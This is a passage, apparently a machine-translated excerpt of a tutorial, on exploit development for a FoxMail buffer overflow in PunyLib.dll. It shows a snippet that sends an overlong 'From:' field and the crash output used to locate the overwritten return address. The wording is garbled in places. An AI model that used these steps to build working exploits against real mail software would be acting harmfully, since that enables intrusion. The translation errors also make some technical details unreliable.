(Demonstrated by the FoxMail vulnerability, how to determine the location of the return point of the overflow. Here we first use the FoxMail vulnerability to practice the essence of the first step of buffer overflow, how to determine the location of the overflow return point. For details, please refer to: xfocus/articles/200403/683.html First, briefly introduce the FoxMail vulnerability. The problem lies in the UrlToLocal function in PunyLib.dll. When an email is judged as spam, it will call UrlToLocal to manage the email. The "From:" field of the body, the warehouse overflow is generated during the management process, which can cause the execution of arbitrary code. Here, because the number of bytes sent cannot exceed 0x200, we first send a 0x150 A when testing, and the sending code is as follows: Memset(buffer, 0x41, 0x150); Sprint(temp, "Form:%s\r\n" ,buffer);Send(sock,temp,strlen(temp),0); The detected result is: "Accessviolationataddress02FA1BABinmodule'punylib.dll',Writeofaddress41414141" Here we need to explain, generally we need to use an overflow point to return our ShellCode is We need our program to read the data of EIP. And here is the (write) write, indicating that the data we just submitted may be too long, not only covering the data of EIP, but also covering the parameters used by other programs. If the parameters are rewritten before the program returns , but the address of the parameter is changed to "41414141", which cannot be written by the bottom layer, so the above (write) write error is caused. Then what we need to do next is to make the field coverage shorter and cover it to the back.
The method of locating ShellCode position by FoxMail vulnerability demonstration.pdf)